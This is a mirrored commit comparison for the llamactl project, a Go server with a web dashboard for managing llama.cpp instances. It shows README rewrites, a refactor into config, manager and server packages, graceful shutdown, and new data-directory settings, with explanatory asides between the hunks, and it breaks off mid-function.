mirror of https://github.com/lordmathis/llamactl.git
synced 2025-11-06 09:04:27 +00:00

Compare commits: 24 commits
Commits (SHA1):
8d9c808be1, 161cd213c5, d6e84f0527, 0846350d41, dacaca8594, 6e3f5cec61,
85b3638efb, 934d1c5aaa, 2abe9c282e, 6a7a9a2d09, a3c44dad1e, 7426008ef9,
cf26aa521a, d94c922314, 3cbd23a6e2, bed172bf73, d449255bc9, de89d0673a,
dd6ffa548c, 7935f19cc1, f1718198a3, b24d744cad, fff8b2dbde, b94909dee4
README.md
@@ -2,93 +2,151 @@
-A control server for managing multiple Llama Server instances with a web-based dashboard.
+**Management server for multiple llama.cpp instances with OpenAI-compatible API routing.**

-## Features
+## Why llamactl?

-- **Multi-instance Management**: Create, start, stop, restart, and delete multiple llama-server instances
-- **Web Dashboard**: Modern React-based UI for managing instances
-- **Auto-restart**: Configurable automatic restart on instance failure
-- **Instance Monitoring**: Real-time health checks and status monitoring
-- **Log Management**: View, search, and download instance logs
-- **REST API**: Full API for programmatic control
-- **OpenAI Compatible**: Route requests to instances by instance name
-- **Configuration Management**: Comprehensive llama-server parameter support
-- **System Information**: View llama-server version, devices, and help
+🚀 **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
+🔗 **OpenAI API Compatible**: Drop-in replacement - route requests by model name
+🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
+🔐 **API Key Authentication**: Separate keys for management vs inference access
+📊 **Instance Monitoring**: Health checks, auto-restart, log management
+⚡ **Persistent State**: Instances survive server restarts

-## Prerequisites
-
-This project requires `llama-server` from llama.cpp to be installed and available in your PATH.
-
-**Install llama.cpp:**
-Follow the installation instructions at https://github.com/ggml-org/llama.cpp
+**Choose llamactl if**: You need authentication, health monitoring, auto-restart, and centralized management of multiple llama-server instances
+**Choose Ollama if**: You want the simplest setup with strong community ecosystem and third-party integrations
+**Choose LM Studio if**: You prefer a polished desktop GUI experience with easy model management
+
+## Quick Start
+
+```bash
+# 1. Install llama-server (one-time setup)
+# See: https://github.com/ggml-org/llama.cpp#quick-start
+
+# 2. Download and run llamactl
+LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
+curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz | tar -xz
+sudo mv llamactl /usr/local/bin/
+
+# 3. Start the server
+llamactl
+# Access dashboard at http://localhost:8080
+```
+
+## Usage
+
+### Create and manage instances via web dashboard:
+
+1. Open http://localhost:8080
+2. Click "Create Instance"
+3. Set model path and GPU layers
+4. Start or stop the instance
+
+### Or use the REST API:
+
+```bash
+# Create instance
+curl -X POST localhost:8080/api/v1/instances/my-7b-model \
+  -H "Authorization: Bearer your-key" \
+  -d '{"model": "/path/to/model.gguf", "gpu_layers": 32}'
+
+# Use with OpenAI SDK
+curl -X POST localhost:8080/v1/chat/completions \
+  -H "Authorization: Bearer your-key" \
+  -d '{"model": "my-7b-model", "messages": [{"role": "user", "content": "Hello!"}]}'
+```
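The curl examples above route OpenAI-style requests by instance name. For completeness, a minimal Go client sketch against the same endpoint; the instance name `my-7b-model` and `your-key` are the README's placeholders, not values the repo ships, and the pre-change README also documents `X-API-Key: <key>` and `api_key=<key>` as alternative ways to pass the key:

```go
package main

import (
	"bytes"
	"fmt"
	"io"
	"net/http"
)

func main() {
	// "model" selects the llamactl instance by name.
	body := []byte(`{"model": "my-7b-model", "messages": [{"role": "user", "content": "Hello!"}]}`)

	req, err := http.NewRequest("POST", "http://localhost:8080/v1/chat/completions", bytes.NewReader(body))
	if err != nil {
		panic(err)
	}
	req.Header.Set("Content-Type", "application/json")
	// Inference key from the auth config (placeholder value).
	req.Header.Set("Authorization", "Bearer your-key")

	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()

	out, _ := io.ReadAll(resp.Body)
	fmt.Println(resp.Status, string(out))
}
```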
 ## Installation

-### Build Requirements
-
-- Go 1.24 or later
-- Node.js 22 or later (for building the web UI)
-
-### Building with Web UI
+### Option 1: Download Binary (Recommended)

 ```bash
-# Clone the repository
+# Linux/macOS - Get latest version and download
+LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
+curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
+sudo mv llamactl /usr/local/bin/
+
+# Or download manually from the releases page:
+# https://github.com/lordmathis/llamactl/releases/latest
+
+# Windows - Download from releases page
+```
+
+### Option 2: Build from Source
+
+Requires Go 1.24+ and Node.js 22+
+
+```bash
 git clone https://github.com/lordmathis/llamactl.git
 cd llamactl
-
-# Install Node.js dependencies
-cd webui
-npm ci
-
-# Build the web UI
-npm run build
-
-# Return to project root and build
-cd ..
+cd webui && npm ci && npm run build && cd ..
 go build -o llamactl ./cmd/server
+```

-# Run the server
-./llamactl
+## Prerequisites
+
+You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
+
+```bash
+# Quick install methods:
+
+# Homebrew (macOS)
+brew install llama.cpp
+
+# Or build from source - see llama.cpp docs
 ```

 ## Configuration

-llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
-
-1. Hardcoded defaults
-2. Configuration file
-3. Environment variables
+llamactl works out of the box with sensible defaults.
+
+```yaml
+server:
+  host: "0.0.0.0"         # Server host to bind to
+  port: 8080              # Server port to bind to
+  allowed_origins: ["*"]  # Allowed CORS origins (default: all)
+  enable_swagger: false   # Enable Swagger UI for API docs
+
+instances:
+  port_range: [8000, 9000]                        # Port range for instances
+  data_dir: ~/.local/share/llamactl               # Data directory (platform-specific, see below)
+  configs_dir: ~/.local/share/llamactl/instances  # Instance configs directory
+  logs_dir: ~/.local/share/llamactl/logs          # Logs directory
+  auto_create_dirs: true                          # Auto-create data/config/logs dirs if missing
+  max_instances: -1                               # Max instances (-1 = unlimited)
+  llama_executable: llama-server                  # Path to llama-server executable
+  default_auto_restart: true                      # Auto-restart new instances by default
+  default_max_restarts: 3                         # Max restarts for new instances
+  default_restart_delay: 5                        # Restart delay (seconds) for new instances
+
+auth:
+  require_inference_auth: true   # Require auth for inference endpoints
+  inference_keys: []             # Keys for inference endpoints
+  require_management_auth: true  # Require auth for management endpoints
+  management_keys: []            # Keys for management endpoints
+```
+
+<details><summary><strong>Full Configuration Guide</strong></summary>
+
+llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
+
+```
+Defaults < Configuration file < Environment variables
+```
 ### Configuration Files

-Configuration files are searched in the following locations:
+#### Configuration File Locations
+
+Configuration files are searched in the following locations (in order of precedence):

 **Linux/macOS:**
 - `./llamactl.yaml` or `./config.yaml` (current directory)
-- `~/.config/llamactl/config.yaml`
+- `$HOME/.config/llamactl/config.yaml`
 - `/etc/llamactl/config.yaml`

 **Windows:**
 - `./llamactl.yaml` or `./config.yaml` (current directory)
 - `%APPDATA%\llamactl\config.yaml`
+- `%USERPROFILE%\llamactl\config.yaml`
 - `%PROGRAMDATA%\llamactl\config.yaml`

-You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable
-
-## API Key Authentication
-
-llamactl now supports API Key authentication for both management and inference (OpenAI-compatible) endpoints. The are separate keys for management and inference APIs. Management keys grant full access; inference keys grant access to OpenAI-compatible endpoints
-
-**How to Use:**
-- Pass your API key in requests using one of:
-  - `Authorization: Bearer <key>` header
-  - `X-API-Key: <key>` header
-  - `api_key=<key>` query parameter
-
-**Auto-generated keys**: If no keys are set and authentication is required, a key will be generated and printed to the terminal at startup. For production, set your own keys in config or environment variables.
+You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable.

 ### Configuration Options
@@ -112,8 +170,11 @@ server:
 ```yaml
 instances:
-  port_range: [8000, 9000]        # Port range for instances
-  log_directory: "/tmp/llamactl"  # Directory for instance logs
+  port_range: [8000, 9000]                          # Port range for instances (default: [8000, 9000])
+  data_dir: "~/.local/share/llamactl"               # Directory for all llamactl data (default varies by OS)
+  configs_dir: "~/.local/share/llamactl/instances"  # Directory for instance configs (default: data_dir/instances)
+  logs_dir: "~/.local/share/llamactl/logs"          # Directory for instance logs (default: data_dir/logs)
+  auto_create_dirs: true                            # Automatically create data/config/logs directories (default: true)
   max_instances: -1                                 # Maximum instances (-1 = unlimited)
   llama_executable: "llama-server"                  # Path to llama-server executable
   default_auto_restart: true                        # Default auto-restart setting
@@ -123,14 +184,17 @@ instances:
 **Environment Variables:**
 - `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
-- `LLAMACTL_LOG_DIR` - Log directory path
+- `LLAMACTL_DATA_DIRECTORY` - Data directory path
+- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
+- `LLAMACTL_LOGS_DIR` - Log directory path
+- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
 - `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
 - `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
 - `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
 - `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
 - `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds

-#### Auth Configuration
+#### Authentication Configuration

 ```yaml
 auth:
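Aside: `LLAMACTL_INSTANCE_PORT_RANGE` accepts both `8000-9000` and `8000,9000`. The repository's `ParsePortRange` appears later in this diff only by name; below is a hedged sketch of parsing with the same documented behavior, returning `[2]int{0, 0}` on invalid input as the config loader expects. This is an illustration, not the repo function:

```go
package config

import (
	"strconv"
	"strings"
)

// parsePortRange mirrors the documented env var format: "8000-9000" or
// "8000,9000". On any parse failure it returns [2]int{0, 0}, the invalid
// marker checked by the loader. Sketch only.
func parsePortRange(s string) [2]int {
	for _, sep := range []string{"-", ","} {
		if parts := strings.Split(s, sep); len(parts) == 2 {
			lo, err1 := strconv.Atoi(strings.TrimSpace(parts[0]))
			hi, err2 := strconv.Atoi(strings.TrimSpace(parts[1]))
			if err1 == nil && err2 == nil {
				return [2]int{lo, hi}
			}
		}
	}
	return [2]int{0, 0} // Invalid format
}
```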
@@ -146,121 +210,8 @@ auth:
 - `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
 - `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys

-### Example Configuration
-
-```yaml
-server:
-  host: "0.0.0.0"
-  port: 8080
-
-instances:
-  port_range: [8001, 8100]
-  log_directory: "/var/log/llamactl"
-  max_instances: 10
-  llama_executable: "/usr/local/bin/llama-server"
-  default_auto_restart: true
-  default_max_restarts: 5
-  default_restart_delay: 10
-
-auth:
-  require_inference_auth: true
-  inference_keys: ["sk-inference-abc123"]
-  require_management_auth: true
-  management_keys: ["sk-management-xyz456"]
-```
-
-## Usage
-
-### Starting the Server
-
-```bash
-# Start with default configuration
-./llamactl
-
-# Start with custom config file
-LLAMACTL_CONFIG_PATH=/path/to/config.yaml ./llamactl
-
-# Start with environment variables
-LLAMACTL_PORT=9090 LLAMACTL_LOG_DIR=/custom/logs ./llamactl
-```
-
-### Web Dashboard
-
-Open your browser and navigate to `http://localhost:8080` to access the web dashboard.
-
-### API Usage
-
-The REST API is available at `http://localhost:8080/api/v1`. See the Swagger documentation at `http://localhost:8080/swagger/` for complete API reference.
-
-#### Create an Instance
-
-```bash
-curl -X POST http://localhost:8080/api/v1/instances/my-instance \
-  -H "Content-Type: application/json" \
-  -d '{
-    "model": "/path/to/model.gguf",
-    "gpu_layers": 32,
-    "auto_restart": true
-  }'
-```
-
-#### List Instances
-
-```bash
-curl http://localhost:8080/api/v1/instances
-```
-
-#### Start/Stop Instance
-
-```bash
-# Start
-curl -X POST http://localhost:8080/api/v1/instances/my-instance/start
-
-# Stop
-curl -X POST http://localhost:8080/api/v1/instances/my-instance/stop
-```
-
-### OpenAI Compatible Endpoints
-
-Route requests to instances by including the instance name as the model parameter:
-
-```bash
-curl -X POST http://localhost:8080/v1/chat/completions \
-  -H "Content-Type: application/json" \
-  -d '{
-    "model": "my-instance",
-    "messages": [{"role": "user", "content": "Hello!"}]
-  }'
-```
-
-## Development
-
-### Running Tests
-
-```bash
-# Go tests
-go test ./...
-
-# Web UI tests
-cd webui
-npm test
-```
-
-### Development Server
-
-```bash
-# Start Go server in development mode
-go run ./cmd/server
-
-# Start web UI development server (in another terminal)
-cd webui
-npm run dev
-```
-
-## API Documentation
-
-Interactive API documentation is available at `http://localhost:8080/swagger/` when the server is running.
+</details>

 ## License

-This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.
+MIT License - see [LICENSE](LICENSE) file.
cmd/server/main.go

@@ -2,9 +2,13 @@ package main
 import (
 	"fmt"
-	llamactl "llamactl/pkg"
+	"llamactl/pkg/config"
+	"llamactl/pkg/manager"
+	"llamactl/pkg/server"
 	"net/http"
 	"os"
+	"os/signal"
+	"syscall"
 )

 // @title llamactl API
@@ -15,29 +19,63 @@ import (
 // @basePath /api/v1
 func main() {

-	config, err := llamactl.LoadConfig("")
+	configPath := os.Getenv("LLAMACTL_CONFIG_PATH")
+	cfg, err := config.LoadConfig(configPath)
 	if err != nil {
 		fmt.Printf("Error loading config: %v\n", err)
 		fmt.Println("Using default configuration.")
 	}

-	// Create the log directory if it doesn't exist
-	err = os.MkdirAll(config.Instances.LogDirectory, 0755)
-	if err != nil {
-		fmt.Printf("Error creating log directory: %v\n", err)
-		return
+	// Create the data directory if it doesn't exist
+	if cfg.Instances.AutoCreateDirs {
+		if err := os.MkdirAll(cfg.Instances.InstancesDir, 0755); err != nil {
+			fmt.Printf("Error creating config directory %s: %v\n", cfg.Instances.InstancesDir, err)
+			fmt.Println("Persistence will not be available.")
+		}
+
+		if err := os.MkdirAll(cfg.Instances.LogsDir, 0755); err != nil {
+			fmt.Printf("Error creating log directory %s: %v\n", cfg.Instances.LogsDir, err)
+			fmt.Println("Instance logs will not be available.")
+		}
 	}

 	// Initialize the instance manager
-	instanceManager := llamactl.NewInstanceManager(config.Instances)
+	instanceManager := manager.NewInstanceManager(cfg.Instances)

 	// Create a new handler with the instance manager
-	handler := llamactl.NewHandler(instanceManager, config)
+	handler := server.NewHandler(instanceManager, cfg)

 	// Setup the router with the handler
-	r := llamactl.SetupRouter(handler)
+	r := server.SetupRouter(handler)

-	// Start the server with the router
-	fmt.Printf("Starting llamactl on port %d...\n", config.Server.Port)
-	http.ListenAndServe(fmt.Sprintf("%s:%d", config.Server.Host, config.Server.Port), r)
+	// Handle graceful shutdown
+	stop := make(chan os.Signal, 1)
+	signal.Notify(stop, os.Interrupt, syscall.SIGTERM)
+
+	server := http.Server{
+		Addr:    fmt.Sprintf("%s:%d", cfg.Server.Host, cfg.Server.Port),
+		Handler: r,
+	}
+
+	go func() {
+		fmt.Printf("Llamactl server listening on %s:%d\n", cfg.Server.Host, cfg.Server.Port)
+		if err := server.ListenAndServe(); err != nil && err != http.ErrServerClosed {
+			fmt.Printf("Error starting server: %v\n", err)
+		}
+	}()
+
+	// Wait for shutdown signal
+	<-stop
+	fmt.Println("Shutting down server...")
+
+	if err := server.Close(); err != nil {
+		fmt.Printf("Error shutting down server: %v\n", err)
+	} else {
+		fmt.Println("Server shut down gracefully.")
+	}
+
+	// Wait for all instances to stop
+	instanceManager.Shutdown()
+
+	fmt.Println("Exiting llamactl.")
 }
pkg/backends/llamacpp

@@ -1,4 +1,4 @@
-package llamactl
+package llamacpp

 import (
 	"encoding/json"

pkg/backends/llamacpp (tests)

@@ -1,17 +1,16 @@
-package llamactl_test
+package llamacpp_test

 import (
 	"encoding/json"
 	"fmt"
+	"llamactl/pkg/backends/llamacpp"
 	"reflect"
 	"slices"
 	"testing"
-
-	llamactl "llamactl/pkg"
 )

 func TestBuildCommandArgs_BasicFields(t *testing.T) {
-	options := llamactl.LlamaServerOptions{
+	options := llamacpp.LlamaServerOptions{
 		Model: "/path/to/model.gguf",
 		Port:  8080,
 		Host:  "localhost",
@@ -46,27 +45,27 @@ func TestBuildCommandArgs_BasicFields(t *testing.T) {
 func TestBuildCommandArgs_BooleanFields(t *testing.T) {
 	tests := []struct {
 		name     string
-		options  llamactl.LlamaServerOptions
+		options  llamacpp.LlamaServerOptions
 		expected []string
 		excluded []string
 	}{
 		{
 			name: "verbose true",
-			options: llamactl.LlamaServerOptions{
+			options: llamacpp.LlamaServerOptions{
 				Verbose: true,
 			},
 			expected: []string{"--verbose"},
 		},
 		{
 			name: "verbose false",
-			options: llamactl.LlamaServerOptions{
+			options: llamacpp.LlamaServerOptions{
 				Verbose: false,
 			},
 			excluded: []string{"--verbose"},
 		},
 		{
 			name: "multiple booleans",
-			options: llamactl.LlamaServerOptions{
+			options: llamacpp.LlamaServerOptions{
 				Verbose:   true,
 				FlashAttn: true,
 				Mlock:     false,
@@ -97,7 +96,7 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
 }

 func TestBuildCommandArgs_NumericFields(t *testing.T) {
-	options := llamactl.LlamaServerOptions{
+	options := llamacpp.LlamaServerOptions{
 		Port:    8080,
 		Threads: 4,
 		CtxSize: 2048,
@@ -127,7 +126,7 @@ func TestBuildCommandArgs_NumericFields(t *testing.T) {
 }

 func TestBuildCommandArgs_ZeroValues(t *testing.T) {
-	options := llamactl.LlamaServerOptions{
+	options := llamacpp.LlamaServerOptions{
 		Port:        0, // Should be excluded
 		Threads:     0, // Should be excluded
 		Temperature: 0, // Should be excluded
@@ -154,7 +153,7 @@ func TestBuildCommandArgs_ZeroValues(t *testing.T) {
 }

 func TestBuildCommandArgs_ArrayFields(t *testing.T) {
-	options := llamactl.LlamaServerOptions{
+	options := llamacpp.LlamaServerOptions{
 		Lora:               []string{"adapter1.bin", "adapter2.bin"},
 		OverrideTensor:     []string{"tensor1", "tensor2", "tensor3"},
 		DrySequenceBreaker: []string{".", "!", "?"},
@@ -179,7 +178,7 @@ func TestBuildCommandArgs_ArrayFields(t *testing.T) {
 }

 func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
-	options := llamactl.LlamaServerOptions{
+	options := llamacpp.LlamaServerOptions{
 		Lora:           []string{}, // Empty array should not generate args
 		OverrideTensor: []string{}, // Empty array should not generate args
 	}
@@ -196,7 +195,7 @@ func TestBuildCommandArgs_EmptyArrays(t *testing.T) {

 func TestBuildCommandArgs_FieldNameConversion(t *testing.T) {
 	// Test snake_case to kebab-case conversion
-	options := llamactl.LlamaServerOptions{
+	options := llamacpp.LlamaServerOptions{
 		CtxSize:      4096,
 		GPULayers:    32,
 		ThreadsBatch: 2,
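The renamed tests above pin down the contract of `BuildCommandArgs`, whose implementation is not part of this diff: snake_case JSON tags become kebab-case flags, zero values and empty arrays emit nothing, true booleans emit bare flags, and array fields repeat the flag once per element. A reflection-based sketch of that contract follows; it is an illustration, not the repository's code:

```go
package llamacpp

import (
	"fmt"
	"reflect"
	"strings"
)

// buildArgs sketches the behavior the tests assert. opts must be a struct
// value whose fields carry json tags (e.g. `json:"ctx_size"`).
func buildArgs(opts any) []string {
	var args []string
	v := reflect.ValueOf(opts)
	t := v.Type()
	for i := 0; i < t.NumField(); i++ {
		tag := strings.Split(t.Field(i).Tag.Get("json"), ",")[0]
		if tag == "" || tag == "-" {
			continue
		}
		flag := "--" + strings.ReplaceAll(tag, "_", "-") // snake_case -> kebab-case
		f := v.Field(i)
		switch f.Kind() {
		case reflect.Bool:
			if f.Bool() { // false booleans emit nothing
				args = append(args, flag)
			}
		case reflect.Int:
			if f.Int() != 0 { // zero values are excluded
				args = append(args, flag, fmt.Sprintf("%d", f.Int()))
			}
		case reflect.Float64:
			if f.Float() != 0 {
				args = append(args, flag, fmt.Sprintf("%v", f.Float()))
			}
		case reflect.String:
			if f.String() != "" {
				args = append(args, flag, f.String())
			}
		case reflect.Slice:
			for j := 0; j < f.Len(); j++ { // empty arrays emit nothing; one flag per element
				args = append(args, flag, fmt.Sprintf("%v", f.Index(j).Interface()))
			}
		}
	}
	return args
}
```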
@@ -235,7 +234,7 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
 		"temperature": 0.7
 	}`

-	var options llamactl.LlamaServerOptions
+	var options llamacpp.LlamaServerOptions
 	err := json.Unmarshal([]byte(jsonData), &options)
 	if err != nil {
 		t.Fatalf("Unmarshal failed: %v", err)
@@ -268,12 +267,12 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 	tests := []struct {
 		name     string
 		jsonData string
-		checkFn  func(llamactl.LlamaServerOptions) error
+		checkFn  func(llamacpp.LlamaServerOptions) error
 	}{
 		{
 			name:     "threads alternatives",
 			jsonData: `{"t": 4, "tb": 2}`,
-			checkFn: func(opts llamactl.LlamaServerOptions) error {
+			checkFn: func(opts llamacpp.LlamaServerOptions) error {
 				if opts.Threads != 4 {
 					return fmt.Errorf("expected threads 4, got %d", opts.Threads)
 				}
@@ -286,7 +285,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "context size alternatives",
 			jsonData: `{"c": 2048}`,
-			checkFn: func(opts llamactl.LlamaServerOptions) error {
+			checkFn: func(opts llamacpp.LlamaServerOptions) error {
 				if opts.CtxSize != 2048 {
 					return fmt.Errorf("expected ctx_size 2048, got %d", opts.CtxSize)
 				}
@@ -296,7 +295,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "gpu layers alternatives",
 			jsonData: `{"ngl": 16}`,
-			checkFn: func(opts llamactl.LlamaServerOptions) error {
+			checkFn: func(opts llamacpp.LlamaServerOptions) error {
 				if opts.GPULayers != 16 {
 					return fmt.Errorf("expected gpu_layers 16, got %d", opts.GPULayers)
 				}
@@ -306,7 +305,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "model alternatives",
 			jsonData: `{"m": "/path/model.gguf"}`,
-			checkFn: func(opts llamactl.LlamaServerOptions) error {
+			checkFn: func(opts llamacpp.LlamaServerOptions) error {
 				if opts.Model != "/path/model.gguf" {
 					return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model)
 				}
@@ -316,7 +315,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "temperature alternatives",
 			jsonData: `{"temp": 0.8}`,
-			checkFn: func(opts llamactl.LlamaServerOptions) error {
+			checkFn: func(opts llamacpp.LlamaServerOptions) error {
 				if opts.Temperature != 0.8 {
 					return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature)
 				}
@@ -327,7 +326,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {

 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			var options llamactl.LlamaServerOptions
+			var options llamacpp.LlamaServerOptions
 			err := json.Unmarshal([]byte(tt.jsonData), &options)
 			if err != nil {
 				t.Fatalf("Unmarshal failed: %v", err)
@@ -343,7 +342,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 func TestUnmarshalJSON_InvalidJSON(t *testing.T) {
 	invalidJSON := `{"port": "not-a-number", "invalid": syntax}`

-	var options llamactl.LlamaServerOptions
+	var options llamacpp.LlamaServerOptions
 	err := json.Unmarshal([]byte(invalidJSON), &options)
 	if err == nil {
 		t.Error("Expected error for invalid JSON")
@@ -357,7 +356,7 @@ func TestUnmarshalJSON_ArrayFields(t *testing.T) {
 		"dry_sequence_breaker": [".", "!", "?"]
 	}`

-	var options llamactl.LlamaServerOptions
+	var options llamacpp.LlamaServerOptions
 	err := json.Unmarshal([]byte(jsonData), &options)
 	if err != nil {
 		t.Fatalf("Unmarshal failed: %v", err)
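These tests depend on the custom `UnmarshalJSON` of `LlamaServerOptions`, also outside this diff. One plausible shape for the alias handling, sketched with a stand-in struct that covers only the aliases the tests exercise (`t`, `tb`, `c`, `ngl`, `m`, `temp`); the repository's actual table is presumably larger:

```go
package llamacpp

import "encoding/json"

// aliases maps llama-server short option names to canonical JSON keys.
// Illustrative subset only.
var aliases = map[string]string{
	"t":    "threads",
	"tb":   "threads_batch",
	"c":    "ctx_size",
	"ngl":  "gpu_layers",
	"m":    "model",
	"temp": "temperature",
}

type serverOptions struct {
	Threads      int     `json:"threads"`
	ThreadsBatch int     `json:"threads_batch"`
	CtxSize      int     `json:"ctx_size"`
	GPULayers    int     `json:"gpu_layers"`
	Model        string  `json:"model"`
	Temperature  float64 `json:"temperature"`
}

// UnmarshalJSON rewrites alias keys to canonical ones, then defers to the
// default decoder via a type alias to avoid infinite recursion.
func (o *serverOptions) UnmarshalJSON(data []byte) error {
	var raw map[string]json.RawMessage
	if err := json.Unmarshal(data, &raw); err != nil {
		return err
	}
	for short, canonical := range aliases {
		if v, ok := raw[short]; ok {
			raw[canonical] = v
			delete(raw, short)
		}
	}
	canonical, err := json.Marshal(raw)
	if err != nil {
		return err
	}
	type plain serverOptions
	return json.Unmarshal(canonical, (*plain)(o))
}
```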
pkg/config

@@ -1,4 +1,4 @@
-package llamactl
+package config

 import (
 	"os"
@@ -10,8 +10,8 @@ import (
 	"gopkg.in/yaml.v3"
 )

-// Config represents the configuration for llamactl
-type Config struct {
+// AppConfig represents the configuration for llamactl
+type AppConfig struct {
 	Server    ServerConfig    `yaml:"server"`
 	Instances InstancesConfig `yaml:"instances"`
 	Auth      AuthConfig      `yaml:"auth"`
@@ -37,8 +37,17 @@ type InstancesConfig struct {
 	// Port range for instances (e.g., 8000,9000)
 	PortRange [2]int `yaml:"port_range"`

-	// Directory where instance logs will be stored
-	LogDirectory string `yaml:"log_directory"`
+	// Directory where all llamactl data will be stored (instances.json, logs, etc.)
+	DataDir string `yaml:"data_dir"`
+
+	// Instance config directory override
+	InstancesDir string `yaml:"configs_dir"`
+
+	// Logs directory override
+	LogsDir string `yaml:"logs_dir"`
+
+	// Automatically create the data directory if it doesn't exist
+	AutoCreateDirs bool `yaml:"auto_create_dirs"`

 	// Maximum number of instances that can be created
 	MaxInstances int `yaml:"max_instances"`
@@ -76,9 +85,9 @@ type AuthConfig struct {
 // 1. Hardcoded defaults
 // 2. Config file
 // 3. Environment variables
-func LoadConfig(configPath string) (Config, error) {
+func LoadConfig(configPath string) (AppConfig, error) {
 	// 1. Start with defaults
-	cfg := Config{
+	cfg := AppConfig{
 		Server: ServerConfig{
 			Host: "0.0.0.0",
 			Port: 8080,
@@ -87,7 +96,10 @@ func LoadConfig(configPath string) (Config, error) {
 		},
 		Instances: InstancesConfig{
 			PortRange: [2]int{8000, 9000},
-			LogDirectory: "/tmp/llamactl",
+			DataDir:        getDefaultDataDirectory(),
+			InstancesDir:   filepath.Join(getDefaultDataDirectory(), "instances"),
+			LogsDir:        filepath.Join(getDefaultDataDirectory(), "logs"),
+			AutoCreateDirs: true,
 			MaxInstances:    -1, // -1 means unlimited
 			LlamaExecutable: "llama-server",
 			DefaultAutoRestart: true,
@@ -114,7 +126,7 @@ func LoadConfig(configPath string) (Config, error) {
 }

 // loadConfigFile attempts to load config from file with fallback locations
-func loadConfigFile(cfg *Config, configPath string) error {
+func loadConfigFile(cfg *AppConfig, configPath string) error {
 	var configLocations []string

 	// If specific config path provided, use only that
@@ -138,7 +150,7 @@ func loadConfigFile(cfg *Config, configPath string) error {
 }

 // loadEnvVars overrides config with environment variables
-func loadEnvVars(cfg *Config) {
+func loadEnvVars(cfg *AppConfig) {
 	// Server config
 	if host := os.Getenv("LLAMACTL_HOST"); host != "" {
 		cfg.Server.Host = host
@@ -157,15 +169,28 @@ func loadEnvVars(cfg *Config) {
 		}
 	}

+	// Data config
+	if dataDir := os.Getenv("LLAMACTL_DATA_DIRECTORY"); dataDir != "" {
+		cfg.Instances.DataDir = dataDir
+	}
+	if instancesDir := os.Getenv("LLAMACTL_INSTANCES_DIR"); instancesDir != "" {
+		cfg.Instances.InstancesDir = instancesDir
+	}
+	if logsDir := os.Getenv("LLAMACTL_LOGS_DIR"); logsDir != "" {
+		cfg.Instances.LogsDir = logsDir
+	}
+	if autoCreate := os.Getenv("LLAMACTL_AUTO_CREATE_DATA_DIR"); autoCreate != "" {
+		if b, err := strconv.ParseBool(autoCreate); err == nil {
+			cfg.Instances.AutoCreateDirs = b
+		}
+	}

 	// Instance config
 	if portRange := os.Getenv("LLAMACTL_INSTANCE_PORT_RANGE"); portRange != "" {
 		if ports := ParsePortRange(portRange); ports != [2]int{0, 0} {
 			cfg.Instances.PortRange = ports
 		}
 	}
-	if logDir := os.Getenv("LLAMACTL_LOG_DIR"); logDir != "" {
-		cfg.Instances.LogDirectory = logDir
-	}
 	if maxInstances := os.Getenv("LLAMACTL_MAX_INSTANCES"); maxInstances != "" {
 		if m, err := strconv.Atoi(maxInstances); err == nil {
 			cfg.Instances.MaxInstances = m
@@ -231,64 +256,63 @@ func ParsePortRange(s string) [2]int {
 	return [2]int{0, 0} // Invalid format
 }

+// getDefaultDataDirectory returns platform-specific default data directory
+func getDefaultDataDirectory() string {
+	switch runtime.GOOS {
+	case "windows":
+		// Try PROGRAMDATA first (system-wide), fallback to LOCALAPPDATA (user)
+		if programData := os.Getenv("PROGRAMDATA"); programData != "" {
+			return filepath.Join(programData, "llamactl")
+		}
+		if localAppData := os.Getenv("LOCALAPPDATA"); localAppData != "" {
+			return filepath.Join(localAppData, "llamactl")
+		}
+		return "C:\\ProgramData\\llamactl" // Final fallback
+
+	case "darwin":
+		// For macOS, use user's Application Support directory
+		if homeDir, _ := os.UserHomeDir(); homeDir != "" {
